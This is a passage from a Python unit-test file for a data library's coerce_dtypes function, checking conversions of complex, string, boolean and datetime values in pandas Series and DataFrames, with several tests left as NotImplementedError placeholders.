err_msg = (f"[datatube.dtype.coerce_dtypes] cannot coerce series "
f"values to {datetime} without losing information (head: "
f"{list(in_series.head())})")
with self.assertRaises(ValueError) as err:
coerce_dtypes(in_series, datetime)
self.assertEqual(str(err.exception), err_msg)
# dataframe
in_df = pd.DataFrame({self.col_name: in_data})
err_msg = (f"[datatube.dtype.coerce_dtypes] cannot coerce column "
f"{repr(self.col_name)} to {datetime} without losing "
f"information (head: {list(in_df[self.col_name].head())})")
with self.assertRaises(ValueError) as err:
coerce_dtypes(in_df, {self.col_name: datetime})
self.assertEqual(str(err.exception), err_msg)
def test_coerce_from_real_complex_to_timedelta_no_na(self):
in_data = self.real_complex
out_data = [timedelta(seconds=c.real) for c in self.real_complex]
# series
in_series = pd.Series(in_data)
out_series = pd.Series(out_data)
result = coerce_dtypes(in_series, timedelta)
assert_series_equal(result, out_series)
# dataframe
in_df = pd.DataFrame({self.col_name: in_data})
out_df = pd.DataFrame({self.col_name: out_data})
result = coerce_dtypes(in_df, {self.col_name: timedelta})
assert_frame_equal(result, out_df)
def test_coerce_from_real_complex_to_timedelta_with_na(self):
in_data = self.real_complex + [None]
out_data = ([timedelta(seconds=c.real) for c in self.real_complex] +
[None])
# series
in_series = pd.Series(in_data)
out_series = pd.Series(out_data)
result = coerce_dtypes(in_series, timedelta)
assert_series_equal(result, out_series)
# dataframe
in_df = pd.DataFrame({self.col_name: in_data})
out_df = pd.DataFrame({self.col_name: out_data})
result = coerce_dtypes(in_df, {self.col_name: timedelta})
assert_frame_equal(result, out_df)
def test_coerce_from_imaginary_complex_to_timedelta_no_na(self):
in_data = self.imag_complex
# series
in_series = pd.Series(in_data)
err_msg = (f"[datatube.dtype.coerce_dtypes] cannot coerce series "
f"values to {timedelta} without losing information (head: "
f"{list(in_series.head())})")
with self.assertRaises(ValueError) as err:
coerce_dtypes(in_series, timedelta)
self.assertEqual(str(err.exception), err_msg)
# dataframe
in_df = pd.DataFrame({self.col_name: in_data})
err_msg = (f"[datatube.dtype.coerce_dtypes] cannot coerce column "
f"{repr(self.col_name)} to {timedelta} without losing "
f"information (head: {list(in_df[self.col_name].head())})")
with self.assertRaises(ValueError) as err:
coerce_dtypes(in_df, {self.col_name: timedelta})
self.assertEqual(str(err.exception), err_msg)
def test_coerce_from_imaginary_complex_to_timedelta_with_na(self):
in_data = self.imag_complex + [None]
# series
in_series = pd.Series(in_data)
err_msg = (f"[datatube.dtype.coerce_dtypes] cannot coerce series "
f"values to {timedelta} without losing information (head: "
f"{list(in_series.head())})")
with self.assertRaises(ValueError) as err:
coerce_dtypes(in_series, timedelta)
self.assertEqual(str(err.exception), err_msg)
# dataframe
in_df = pd.DataFrame({self.col_name: in_data})
err_msg = (f"[datatube.dtype.coerce_dtypes] cannot coerce column "
f"{repr(self.col_name)} to {timedelta} without losing "
f"information (head: {list(in_df[self.col_name].head())})")
with self.assertRaises(ValueError) as err:
coerce_dtypes(in_df, {self.col_name: timedelta})
self.assertEqual(str(err.exception), err_msg)
def test_coerce_from_complex_to_object_no_na(self):
in_series = pd.Series(self.imag_complex)
out_series = in_series.astype(np.dtype("O"))
# series
result = coerce_dtypes(in_series, object)
assert_series_equal(result, out_series)
# dataframe
in_df = pd.DataFrame({self.col_name: in_series})
out_df = pd.DataFrame({self.col_name: out_series})
result = coerce_dtypes(in_df, {self.col_name: object})
assert_frame_equal(result, out_df)
def test_coerce_from_complex_to_object_wth_na(self):
in_series = pd.Series(self.imag_complex + [None])
out_series = in_series.astype(np.dtype("O"))
# series
result = coerce_dtypes(in_series, object)
assert_series_equal(result, out_series)
# dataframe
in_df = pd.DataFrame({self.col_name: in_series})
out_df = pd.DataFrame({self.col_name: out_series})
result = coerce_dtypes(in_df, {self.col_name: object})
assert_frame_equal(result, out_df)
class CoerceStringDtypeTests(unittest.TestCase):
@classmethod
def setUpClass(cls) -> None:
random.seed(12345)
size = 3
cls.integers = [-1 * size // 2 + i + 1 for i in range(size)]
# ^ = [..., -1, 0, 1, ...]
cls.floats = [i + random.random() for i in cls.integers]
# ^ = [..., -1+e, 0+e, 1+e, ...]
cls.complex = [complex(f, f) for f in cls.floats]
# ^ = [..., complex(-1+e,-1+e), complex(0+e,0+e), complex(1+e,1+e), ...]
cls.characters = [chr((i % 26) + ord("a")) for i in range(size)]
# ^ = ["a", "b", "c", ..., "a", "b", "c", ...]
cls.booleans = [bool((i + 1) % 2) for i in range(size)]
# ^ = [True, False, True, False, ...]
cls.naive_datetimes = [datetime.utcfromtimestamp(f) for f in cls.floats]
# ^ = [..., utc time -1+e, utc time 0+e, utc_time 1+e, ...] (no tz)
cls.aware_datetimes = [datetime.fromtimestamp(f, tz=timezone.utc)
for f in cls.floats]
# ^ = [..., utc time -1+e, utc time 0+e, utc_time 1+e, ...] (with tz)
cls.aware_naive_datetimes = []
for index, f in enumerate(cls.floats):
if index % 2: # naive
cls.aware_naive_datetimes.append(datetime.utcfromtimestamp(f))
else: # aware
val = datetime.fromtimestamp(f, tz=timezone.utc)
cls.aware_naive_datetimes.append(val)
# ^ = [aware, naive, aware, naive, aware, ...]
cls.mixed_timezones = []
for index, f in enumerate(cls.floats):
tz_name = pytz.all_timezones[index % len(pytz.all_timezones)]
tz = pytz.timezone(tz_name)
val = datetime.fromtimestamp(f, tz=tz)
cls.mixed_timezones.append(val)
# ^ = ["Africa/Abidjan", "Africa/Accra", "Africa/Addis_Ababa", ...]
cls.timedeltas = [timedelta(seconds=f) for f in cls.floats]
# ^ = [..., -1+e seconds, 0+e seconds, 1+e seconds, ...]
cls.col_name = "strings"
def test_coerce_from_integer_string_to_integer_no_na(self):
in_data = [str(i) for i in self.integers]
out_data = self.integers
# series
in_series = pd.Series(in_data)
out_series = pd.Series(out_data)
result = coerce_dtypes(in_series, int)
assert_series_equal(result, out_series)
# dataframe
in_df = pd.DataFrame({self.col_name: in_data})
out_df = pd.DataFrame({self.col_name: out_data})
result = coerce_dtypes(in_df, {self.col_name: int})
assert_frame_equal(result, out_df)
def test_coerce_from_integer_string_to_integer_with_na(self):
in_data = [str(i) for i in self.integers] + [None]
out_data = self.integers + [None]
# series
in_series = pd.Series(in_data)
out_series = pd.Series(out_data)
result = coerce_dtypes(in_series, int)
assert_series_equal(result, out_series)
# dataframe
in_df = pd.DataFrame({self.col_name: in_data})
out_df = pd.DataFrame({self.col_name: out_data})
result = coerce_dtypes(in_df, {self.col_name: int})
assert_frame_equal(result, out_df)
def test_coerce_from_float_string_to_float_no_na(self):
in_data = [str(f) for f in self.floats]
out_data = self.floats
# series
in_series = pd.Series(in_data)
out_series = pd.Series(out_data)
result = coerce_dtypes(in_series, float)
assert_series_equal(result, out_series)
# dataframe
in_df = pd.DataFrame({self.col_name: in_data})
out_df = pd.DataFrame({self.col_name: out_data})
result = coerce_dtypes(in_df, {self.col_name: float})
assert_frame_equal(result, out_df)
def test_coerce_from_float_string_to_float_with_na(self):
in_data = [str(f) for f in self.floats] + [None]
out_data = self.floats + [None]
# series
in_series = pd.Series(in_data)
out_series = pd.Series(out_data)
result = coerce_dtypes(in_series, float)
assert_series_equal(result, out_series)
# dataframe
in_df = pd.DataFrame({self.col_name: in_data})
out_df = pd.DataFrame({self.col_name: out_data})
result = coerce_dtypes(in_df, {self.col_name: float})
assert_frame_equal(result, out_df)
def test_coerce_from_complex_string_to_complex_no_na(self):
in_data = [str(c) for c in self.complex]
out_data = self.complex
# series
in_series = pd.Series(in_data)
out_series = pd.Series(out_data)
result = coerce_dtypes(in_series, complex)
assert_series_equal(result, out_series)
# dataframe
in_df = pd.DataFrame({self.col_name: in_data})
out_df = pd.DataFrame({self.col_name: out_data})
result = coerce_dtypes(in_df, {self.col_name: complex})
assert_frame_equal(result, out_df)
def test_coerce_from_complex_string_to_complex_with_na(self):
in_data = [str(c) for c in self.complex] + [None]
out_data = self.complex + [None]
# series
in_series = pd.Series(in_data)
out_series = pd.Series(out_data)
result = coerce_dtypes(in_series, complex)
assert_series_equal(result, out_series)
# dataframe
in_df = pd.DataFrame({self.col_name: in_data})
out_df = pd.DataFrame({self.col_name: out_data})
result = coerce_dtypes(in_df, {self.col_name: complex})
assert_frame_equal(result, out_df)
def test_coerce_from_character_string_to_string_no_na(self):
in_data = self.characters
out_data = in_data.copy()
# series
in_series = pd.Series(in_data)
out_series = pd.Series(out_data)
result = coerce_dtypes(in_series, str)
assert_series_equal(result, out_series)
# dataframe
in_df = pd.DataFrame({self.col_name: in_data})
out_df = pd.DataFrame({self.col_name: out_data})
result = coerce_dtypes(in_df, {self.col_name: str})
assert_frame_equal(result, out_df)
def test_coerce_from_character_string_to_string_with_na(self):
in_data = self.characters + [None]
out_data = in_data.copy()
# series
in_series = pd.Series(in_data)
out_series = pd.Series(out_data)
result = coerce_dtypes(in_series, str)
assert_series_equal(result, out_series)
# dataframe
in_df = pd.DataFrame({self.col_name: in_data})
out_df = pd.DataFrame({self.col_name: out_data})
result = coerce_dtypes(in_df, {self.col_name: str})
assert_frame_equal(result, out_df)
def test_coerce_from_boolean_string_to_boolean_no_na(self):
in_data = [str(b) for b in self.booleans]
out_data = self.booleans
# series
in_series = pd.Series(in_data)
out_series = pd.Series(out_data)
result = coerce_dtypes(in_series, bool)
assert_series_equal(result, out_series)
# dataframe
in_df = pd.DataFrame({self.col_name: in_data})
out_df = pd.DataFrame({self.col_name: out_data})
result = coerce_dtypes(in_df, {self.col_name: bool})
assert_frame_equal(result, out_df)
def test_coerce_from_boolean_string_to_boolean_with_na(self):
in_data = [str(b) for b in self.booleans] + [None]
out_data = self.booleans + [None]
# series
in_series = pd.Series(in_data)
out_series = pd.Series(out_data)
result = coerce_dtypes(in_series, bool)
assert_series_equal(result, out_series)
# dataframe
in_df = pd.DataFrame({self.col_name: in_data})
out_df = pd.DataFrame({self.col_name: out_data})
result = coerce_dtypes(in_df, {self.col_name: bool})
assert_frame_equal(result, out_df)
def test_coerce_from_naive_datetime_string_to_datetime_no_na(self):
in_data = [str(d) for d in self.naive_datetimes]
out_data = self.naive_datetimes
# series
in_series = pd.Series(in_data)
out_series = pd.Series(out_data)
result = coerce_dtypes(in_series, datetime)
assert_series_equal(result, out_series)
# dataframe
in_df = pd.DataFrame({self.col_name: in_data})
out_df = pd.DataFrame({self.col_name: out_data})
result = coerce_dtypes(in_df, {self.col_name: datetime})
assert_frame_equal(result, out_df)
def test_coerce_from_naive_datetime_string_to_datetime_with_na(self):
in_data = [str(d) for d in self.naive_datetimes] + [None]
out_data = self.naive_datetimes + [None]
# series
in_series = pd.Series(in_data)
out_series = pd.Series(out_data)
result = coerce_dtypes(in_series, datetime)
assert_series_equal(result, out_series)
# dataframe
in_df = pd.DataFrame({self.col_name: in_data})
out_df = pd.DataFrame({self.col_name: out_data})
result = coerce_dtypes(in_df, {self.col_name: datetime})
assert_frame_equal(result, out_df)
def test_coerce_from_naive_ISO_8601_string_to_datetime_no_na(self):
in_data = [d.isoformat() for d in self.naive_datetimes]
out_data = self.naive_datetimes
# series
in_series = pd.Series(in_data)
out_series = pd.Series(out_data)
result = coerce_dtypes(in_series, datetime)
assert_series_equal(result, out_series)
# dataframe
in_df = pd.DataFrame({self.col_name: in_data})
out_df = pd.DataFrame({self.col_name: out_data})
result = coerce_dtypes(in_df, {self.col_name: datetime})
assert_frame_equal(result, out_df)
def test_coerce_from_naive_ISO_8601_string_to_datetime_with_na(self):
in_data = [d.isoformat() for d in self.naive_datetimes] + [None]
out_data = self.naive_datetimes + [None]
# series
in_series = pd.Series(in_data)
out_series = pd.Series(out_data)
result = coerce_dtypes(in_series, datetime)
assert_series_equal(result, out_series)
# dataframe
in_df = pd.DataFrame({self.col_name: in_data})
out_df = pd.DataFrame({self.col_name: out_data})
result = coerce_dtypes(in_df, {self.col_name: datetime})
assert_frame_equal(result, out_df)
def test_coerce_from_aware_datetime_string_to_datetime_no_na(self):
in_data = [str(d) for d in self.aware_datetimes]
out_data = self.aware_datetimes
# series
in_series = pd.Series(in_data)
out_series = pd.Series(out_data)
result = coerce_dtypes(in_series, datetime)
assert_series_equal(result, out_series)
# dataframe
in_df = pd.DataFrame({self.col_name: in_data})
out_df = pd.DataFrame({self.col_name: out_data})
result = coerce_dtypes(in_df, {self.col_name: datetime})
assert_frame_equal(result, out_df)
def test_coerce_from_aware_datetime_string_to_datetime_with_na(self):
in_data = [str(d) for d in self.aware_datetimes] + [None]
out_data = self.aware_datetimes + [None]
# series
in_series = pd.Series(in_data)
out_series = pd.Series(out_data)
result = coerce_dtypes(in_series, datetime)
assert_series_equal(result, out_series)
# dataframe
in_df = pd.DataFrame({self.col_name: in_data})
out_df = pd.DataFrame({self.col_name: out_data})
result = coerce_dtypes(in_df, {self.col_name: datetime})
assert_frame_equal(result, out_df)
def test_coerce_from_aware_ISO_8601_string_to_datetime_no_na(self):
in_data = [d.isoformat() for d in self.aware_datetimes]
out_data = self.aware_datetimes
# series
in_series = pd.Series(in_data)
out_series = pd.Series(out_data)
result = coerce_dtypes(in_series, datetime)
assert_series_equal(result, out_series)
# dataframe
in_df = pd.DataFrame({self.col_name: in_data})
out_df = pd.DataFrame({self.col_name: out_data})
result = coerce_dtypes(in_df, {self.col_name: datetime})
assert_frame_equal(result, out_df)
def test_coerce_from_aware_ISO_8601_string_to_datetime_with_na(self):
in_data = [d.isoformat() for d in self.aware_datetimes] + [None]
out_data = self.aware_datetimes + [None]
# series
in_series = pd.Series(in_data)
out_series = pd.Series(out_data)
result = coerce_dtypes(in_series, datetime)
assert_series_equal(result, out_series)
# dataframe
in_df = pd.DataFrame({self.col_name: in_data})
out_df = pd.DataFrame({self.col_name: out_data})
result = coerce_dtypes(in_df, {self.col_name: datetime})
assert_frame_equal(result, out_df)
def test_coerce_from_aware_naive_datetime_string_to_datetime_no_na(self):
raise NotImplementedError()
def test_coerce_from_aware_naive_datetime_string_to_datetime_with_na(self):
raise NotImplementedError()
def test_coerce_from_aware_naive_ISO_8601_string_to_datetime_no_na(self):
raise NotImplementedError()
def test_coerce_from_aware_naive_ISO_8601_string_to_datetime_with_na(self):
raise NotImplementedError()
def test_coerce_from_mixed_tz_datetime_string_to_datetime_no_na(self):
raise NotImplementedError()
def test_coerce_from_mixed_tz_datetime_string_to_datetime_with_na(self):
raise NotImplementedError()
def test_coerce_from_mixed_tz_ISO_8601_string_to_datetime_no_na(self):
raise NotImplementedError()
def test_coerce_from_mixed_tz_ISO_8601_string_to_datetime_with_na(self):
raise NotImplementedError()
def test_coerce_from_timedelta_string_to_timedelta_no_na(self):
in_data = [str(t) for t in self.timedeltas]
out_data = self.timedeltas
# series
in_series = pd.Series(in_data)
out_series = pd.Series(out_data)
result = coerce_dtypes(in_series, timedelta)
assert_series_equal(result, out_series)
# dataframe
in_df = pd.DataFrame({self.col_name: in_data})
out_df = pd.DataFrame({self.col_name: out_data})
result = coerce_dtypes(in_df, {self.col_name: timedelta})
assert_frame_equal(result, out_df)
def test_coerce_from_timedelta_string_to_timedelta_with_na(self):
in_data = [str(t) for t in self.timedeltas] + [None]
out_data = self.timedeltas + [None]
# series
in_series = pd.Series(in_data)
out_series = pd.Series(out_data)
result = coerce_dtypes(in_series, timedelta)
assert_series_equal(result, out_series)
# dataframe
in_df = pd.DataFrame({self.col_name: in_data})
out_df = pd.DataFrame({self.col_name: out_data})
result = coerce_dtypes(in_df, {self.col_name: timedelta})
assert_frame_equal(result, out_df)
def test_coerce_from_string_to_object_no_na(self):
in_series = pd.Series(self.timedeltas)
out_series = in_series.astype(np.dtype("O"))
# series
result = coerce_dtypes(in_series, object)
assert_series_equal(result, out_series)
# dataframe
in_df = pd.DataFrame({self.col_name: in_series})
out_df = pd.DataFrame({self.col_name: out_series})
result = coerce_dtypes(in_df, {self.col_name: object})
assert_frame_equal(result, out_df)
def test_coerce_from_string_to_object_with_na(self):
in_series = pd.Series(self.timedeltas + [None])
out_series = in_series.astype(np.dtype("O"))
# series
result = coerce_dtypes(in_series, object)
assert_series_equal(result, out_series)
# dataframe
in_df = pd.DataFrame({self.col_name: in_series})
out_df = pd.DataFrame({self.col_name: out_series})
result = coerce_dtypes(in_df, {self.col_name: object})
assert_frame_equal(result, out_df)
class CoerceBooleanDtypeTests(unittest.TestCase):
@classmethod
def setUpClass(cls) -> None:
size = 3
cls.booleans = [bool((i + 1) % 2) for i in range(size)]
# ^ = [True, False, True, False, ...]
cls.col_name = "booleans"
def test_coerce_from_boolean_to_integer_no_na(self):
in_data = self.booleans
out_data = [int(b) for b in self.booleans]
# series
in_series = pd.Series(in_data)
out_series = pd.Series(out_data)
result = coerce_dtypes(in_series, int)
assert_series_equal(result, out_series)
# dataframe
in_df = pd.DataFrame({self.col_name: in_data})
out_df = pd.DataFrame({self.col_name: out_data})
result = coerce_dtypes(in_df, {self.col_name: int})
assert_frame_equal(result, out_df)
def test_coerce_from_boolean_to_integer_with_na(self):
in_data = self.booleans + [None]
out_data = [int(b) for b in self.booleans] + [None]
# series
in_series = pd.Series(in_data)
out_series = pd.Series(out_data)
result = coerce_dtypes(in_series, int)
assert_series_equal(result, out_series)
# dataframe
in_df = pd.DataFrame({self.col_name: in_data})
out_df = pd.DataFrame({self.col_name: out_data})
result = coerce_dtypes(in_df, {self.col_name: int})
assert_frame_equal(result, out_df)
def test_coerce_from_boolean_to_float_no_na(self):
in_data = self.booleans
out_data = [float(b) for b in self.booleans]
# series
in_series = pd.Series(in_data)
out_series = pd.Series(out_data)
result = coerce_dtypes(in_series, float)
assert_series_equal(result, out_series)
# dataframe
in_df = pd.DataFrame({self.col_name: in_data})
out_df = pd.DataFrame({self.col_name: out_data})
result = coerce_dtypes(in_df, {self.col_name: float})
assert_frame_equal(result, out_df)
def test_coerce_from_boolean_to_float_with_na(self):
in_data = self.booleans + [None]
out_data = [float(b) for b in self.booleans] + [None]
# series
in_series = pd.Series(in_data)
out_series = pd.Series(out_data)
result = coerce_dtypes(in_series, float)
assert_series_equal(result, out_series)
# dataframe
in_df = pd.DataFrame({self.col_name: in_data})
out_df = pd.DataFrame({self.col_name: out_data})
result = coerce_dtypes(in_df, {self.col_name: float})
assert_frame_equal(result, out_df)
def test_coerce_from_boolean_to_complex_no_na(self):
in_data = self.booleans
out_data = [complex(b, 0) for b in self.booleans]
# series
in_series = pd.Series(in_data)
out_series = pd.Series(out_data)
result = coerce_dtypes(in_series, complex)
assert_series_equal(result, out_series)
# dataframe
in_df = pd.DataFrame({self.col_name: in_data})
out_df = pd.DataFrame({self.col_name: out_data})
result = coerce_dtypes(in_df, {self.col_name: complex})
assert_frame_equal(result, out_df)
def test_coerce_from_boolean_to_complex_with_na(self):
in_data = self.booleans + [None]
out_data = [complex(b, 0) for b in self.booleans] + [None]
# series
in_series = pd.Series(in_data)
out_series = pd.Series(out_data)
result = coerce_dtypes(in_series, complex)
assert_series_equal(result, out_series)
# dataframe
in_df = pd.DataFrame({self.col_name: in_data})
out_df = pd.DataFrame({self.col_name: out_data})
result = coerce_dtypes(in_df, {self.col_name: complex})
assert_frame_equal(result, out_df)
def test_coerce_from_boolean_to_string_no_na(self):
in_data = self.booleans
out_data = [str(b) for b in self.booleans]
# series
in_series = pd.Series(in_data)
out_series = pd.Series(out_data)
result = coerce_dtypes(in_series, str)
assert_series_equal(result, out_series)
# dataframe
in_df = pd.DataFrame({self.col_name: in_data})
out_df = pd.DataFrame({self.col_name: out_data})
result = coerce_dtypes(in_df, {self.col_name: str})
assert_frame_equal(result, out_df)
def test_coerce_from_boolean_to_string_with_na(self):
in_data = self.booleans + [None]
out_data = [str(b) for b in self.booleans] + [None]
# series
in_series = pd.Series(in_data)
out_series = pd.Series(out_data)
result = coerce_dtypes(in_series, str)
assert_series_equal(result, out_series)
# dataframe
in_df = pd.DataFrame({self.col_name: in_data})
out_df = pd.DataFrame({self.col_name: out_data})
result = coerce_dtypes(in_df, {self.col_name: str})
assert_frame_equal(result, out_df)
def test_coerce_from_boolean_to_boolean_no_na(self):
in_data = self.booleans
out_data = in_data.copy()
# series
in_series = pd.Series(in_data)
out_series = pd.Series(out_data)
result = coerce_dtypes(in_series, bool)
assert_series_equal(result, out_series)
# dataframe
in_df = pd.DataFrame({self.col_name: in_data})
out_df = pd.DataFrame({self.col_name: out_data})
result = coerce_dtypes(in_df, {self.col_name: bool})
assert_frame_equal(result, out_df)
def test_coerce_from_boolean_to_boolean_with_na(self):
in_data = self.booleans + [None]
out_data = in_data.copy()
# series
in_series = pd.Series(in_data)
out_series = pd.Series(out_data)
result = coerce_dtypes(in_series, bool)
assert_series_equal(result, out_series)
# dataframe
in_df = pd.DataFrame({self.col_name: in_data})
out_df = pd.DataFrame({self.col_name: out_data})
result = coerce_dtypes(in_df, {self.col_name: bool})
assert_frame_equal(result, out_df)
def test_coerce_from_boolean_to_datetime_no_na(self):
in_data = self.booleans
out_data = [datetime.fromtimestamp(b, tz=timezone.utc)
for b in self.booleans]
# series
in_series = pd.Series(in_data)
out_series = pd.Series(out_data)
result = coerce_dtypes(in_series, datetime)
assert_series_equal(result, out_series)
# dataframe
in_df = pd.DataFrame({self.col_name: in_data})
out_df = pd.DataFrame({self.col_name: out_data})
result = coerce_dtypes(in_df, {self.col_name: datetime})
assert_frame_equal(result, out_df)
def test_coerce_from_boolean_to_datetime_with_na(self):
in_data = self.booleans + [None]
out_data = [datetime.fromtimestamp(b, tz=timezone.utc)
for b in self.booleans] + [None]
# series
in_series = pd.Series(in_data)
out_series = pd.Series(out_data)
result = coerce_dtypes(in_series, datetime)
assert_series_equal(result, out_series)
# dataframe
in_df = pd.DataFrame({self.col_name: in_data})
out_df = pd.DataFrame({self.col_name: out_data})
result = coerce_dtypes(in_df, {self.col_name: datetime})
assert_frame_equal(result, out_df)
def test_coerce_from_boolean_to_timedelta_no_na(self):
in_data = self.booleans
out_data = [timedelta(seconds=b) for b in self.booleans]
# series
in_series = pd.Series(in_data)
out_series = pd.Series(out_data)
result = coerce_dtypes(in_series, timedelta)
assert_series_equal(result, out_series)
# dataframe
in_df = pd.DataFrame({self.col_name: in_data})
out_df = pd.DataFrame({self.col_name: out_data})
result = coerce_dtypes(in_df, {self.col_name: timedelta})
assert_frame_equal(result, out_df)
def test_coerce_from_boolean_to_timedelta_with_na(self):
in_data = self.booleans + [None]
out_data = [timedelta(seconds=b) for b in self.booleans] + [None]
# series
in_series = pd.Series(in_data)
out_series = pd.Series(out_data)
result = coerce_dtypes(in_series, timedelta)
assert_series_equal(result, out_series)
# dataframe
in_df = pd.DataFrame({self.col_name: in_data})
out_df = pd.DataFrame({self.col_name: out_data})
result = coerce_dtypes(in_df, {self.col_name: timedelta})
assert_frame_equal(result, out_df)
def test_coerce_from_boolean_to_object_no_na(self):
in_series = pd.Series(self.booleans)
out_series = in_series.astype(np.dtype("O"))
# series
result = coerce_dtypes(in_series, object)
assert_series_equal(result, out_series)
# dataframe
in_df = pd.DataFrame({self.col_name: in_series})
out_df = pd.DataFrame({self.col_name: in_series})
result = coerce_dtypes(in_df, {self.col_name: object})
assert_frame_equal(result, out_df)
def test_coerce_from_boolean_to_object_with_na(self):
in_series = pd.Series(self.booleans + [None])
out_series = in_series.astype(np.dtype("O"))
# series
result = coerce_dtypes(in_series, object)
assert_series_equal(result, out_series)
# dataframe
in_df = pd.DataFrame({self.col_name: in_series})
out_df = pd.DataFrame({self.col_name: in_series})
result = coerce_dtypes(in_df, {self.col_name: object})
assert_frame_equal(result, out_df)
class CoerceDatetimeDtypeTests(unittest.TestCase):
@classmethod
def setUpClass(cls) -> None:
random.seed(12345)
size = 3
integers = [-1 * size // 2 + i + 1 for i in range(size)]
floats = [i + random.random() for i in integers]
cls.whole_datetimes = [datetime.fromtimestamp(i, tz=timezone.utc)
for i in integers]
# ^ = [..., utc time -1, utc time 0, utc time 1, ...]
cls.datetimes_between_0_and_1 = [datetime.fromtimestamp(random.random(),
tz=timezone.utc)
for _ in range(size)]
# ^ = [utc time 0+e, utc time 0+e, utc time 0+e, ...]
cls.bool_flags = [datetime.fromtimestamp((i + 1) % 2, tz=timezone.utc)
for i in range(size)]
# ^ = [utc time 1, utc time 0, utc time 1, utc time 0, ...]
cls.naive_datetimes = [datetime.utcfromtimestamp(f) for f in floats]
# ^ = [..., utc time -1+e, utc time 0+e, utc time 1+e, ...] (no tz)
cls.aware_datetimes = [datetime.fromtimestamp(f, tz=timezone.utc)
for f in floats]
# ^ = [..., utc time -1+e, utc time 0+e, utc_time 1+e, ...] (with tz)
cls.aware_naive_datetimes = []
for index, f in enumerate(floats):
if index % 2: # naive
cls.aware_naive_datetimes.append(datetime.utcfromtimestamp(f))
else: # aware
val = datetime.fromtimestamp(f, tz=timezone.utc)
cls.aware_naive_datetimes.append(val)
# ^ = [aware, naive, aware, naive, aware, ...]
cls.mixed_timezones = []
for index, f in enumerate(floats):
tz_name = pytz.all_timezones[index % len(pytz.all_timezones)]
tz = pytz.timezone(tz_name)
val = datetime.fromtimestamp(f, tz=tz)
cls.mixed_timezones.append(val)
# ^ = ["Africa/Abidjan", "Africa/Accra", "Africa/Addis_Ababa", ...]
cls.col_name = "datetimes"
def test_coerce_from_whole_datetime_to_integer_no_na(self):
in_data = self.whole_datetimes
out_data = [int(d.timestamp()) for d in self.whole_datetimes]
# series
in_series = pd.Series(in_data)
out_series = pd.Series(out_data)
result = coerce_dtypes(in_series, int)
assert_series_equal(result, out_series)
# dataframe
in_df = pd.DataFrame({self.col_name: in_data})
out_df = pd.DataFrame({self.col_name: out_data})
result = coerce_dtypes(in_df, {self.col_name: int})
assert_frame_equal(result, out_df)
def test_coerce_from_whole_datetime_to_integer_with_na(self):
in_data = self.whole_datetimes + [None]
out_data = [int(d.timestamp()) for d in self.whole_datetimes] + [None]
# series
in_series = pd.Series(in_data)
out_series = pd.Series(out_data)
result = coerce_dtypes(in_series, int)
assert_series_equal(result, out_series)
# dataframe
in_df = pd.DataFrame({self.col_name: in_data})
out_df = pd.DataFrame({self.col_name: out_data})
result = coerce_dtypes(in_df, {self.col_name: int})
assert_frame_equal(result, out_df)
def test_coerce_from_random_datetime_to_integer_no_na(self):
in_data = self.aware_datetimes
# series
in_series = pd.Series(in_data)
err_msg = (f"[datatube.dtype.coerce_dtypes] cannot coerce series "
f"values to {int} without losing information (head: "
f"{list(in_series.head())})")
with self.assertRaises(ValueError) as err:
coerce_dtypes(in_series, int)
self.assertEqual(str(err.exception), err_msg)
# dataframe
in_df = pd.DataFrame({self.col_name: in_data})
err_msg = (f"[datatube.dtype.coerce_dtypes] cannot coerce column "
f"{repr(self.col_name)} to {int} without losing "
f"information (head: {list(in_df[self.col_name].head())})")
with self.assertRaises(ValueError) as err:
coerce_dtypes(in_df, {self.col_name: int})
self.assertEqual(str(err.exception), err_msg)
def test_coerce_from_random_datetime_to_integer_with_na(self):
in_data = self.aware_datetimes + [None]
# series
in_series = pd.Series(in_data)
err_msg = (f"[datatube.dtype.coerce_dtypes] cannot coerce series "
f"values to {int} without losing information (head: "
f"{list(in_series.head())})")
with self.assertRaises(ValueError) as err:
coerce_dtypes(in_series, int)
self.assertEqual(str(err.exception), err_msg)
# dataframe
in_df = pd.DataFrame({self.col_name: in_data})
err_msg = (f"[datatube.dtype.coerce_dtypes] cannot coerce column "
f"{repr(self.col_name)} to {int} without losing "
f"information (head: {list(in_df[self.col_name].head())})")
with self.assertRaises(ValueError) as err:
coerce_dtypes(in_df, {self.col_name: int})
self.assertEqual(str(err.exception), err_msg)
def test_coerce_datetime_to_float_no_na(self):
in_data = self.aware_datetimes
out_data = [d.timestamp() for d in self.aware_datetimes]
# series
in_series = pd.Series(in_data)
out_series = pd.Series(out_data)
result = coerce_dtypes(in_series, float)
assert_series_equal(result, out_series)
# dataframe
in_df = pd.DataFrame({self.col_name: in_data})
out_df = pd.DataFrame({self.col_name: out_data})
result = coerce_dtypes(in_df, {self.col_name: float})
assert_frame_equal(result, out_df)
def test_coerce_datetime_to_float_with_na(self):
in_data = self.aware_datetimes + [None]
out_data = [d.timestamp() for d in self.aware_datetimes] + [None]
# series
in_series = pd.Series(in_data)
out_series = pd.Series(out_data)
result = coerce_dtypes(in_series, float)
assert_series_equal(result, out_series)
# dataframe
in_df = pd.DataFrame({self.col_name: in_data})
out_df = pd.DataFrame({self.col_name: out_data})
result = coerce_dtypes(in_df, {self.col_name: float})
assert_frame_equal(result, out_df)
def test_coerce_from_datetime_to_complex_no_na(self):
in_data = self.aware_datetimes
out_data = [complex(d.timestamp(), 0) for d in self.aware_datetimes]
# series
in_series = pd.Series(in_data)
out_series = pd.Series(out_data)
result = coerce_dtypes(in_series, complex)
assert_series_equal(result, out_series)
# dataframe
in_df = pd.DataFrame({self.col_name: in_data})
out_df = pd.DataFrame({self.col_name: out_data})
result = coerce_dtypes(in_df, {self.col_name: complex})
assert_frame_equal(result, out_df)
def test_coerce_from_datetime_to_complex_with_na(self):
in_data = self.aware_datetimes + [None]
out_data = ([complex(d.timestamp(), 0) for d in self.aware_datetimes] +
[None])
# series
in_series = pd.Series(in_data)
out_series = pd.Series(out_data)
result = coerce_dtypes(in_series, complex)
assert_series_equal(result, out_series)
# dataframe
in_df = pd.DataFrame({self.col_name: in_data})
out_df = pd.DataFrame({self.col_name: out_data})
result = coerce_dtypes(in_df, {self.col_name: complex})
assert_frame_equal(result, out_df)
def test_coerce_from_datetime_to_string_no_na(self):
in_data = self.aware_datetimes
out_data = [d.isoformat() for d in self.aware_datetimes]
# series
in_series = pd.Series(in_data)
out_series = pd.Series(out_data)
result = coerce_dtypes(in_series, str)
assert_series_equal(result, out_series)
# dataframe
in_df = pd.DataFrame({self.col_name: in_data})
out_df = pd.DataFrame({self.col_name: out_data})
result = coerce_dtypes(in_df, {self.col_name: str})
assert_frame_equal(result, out_df)
def test_coerce_from_datetime_to_string_with_na(self):
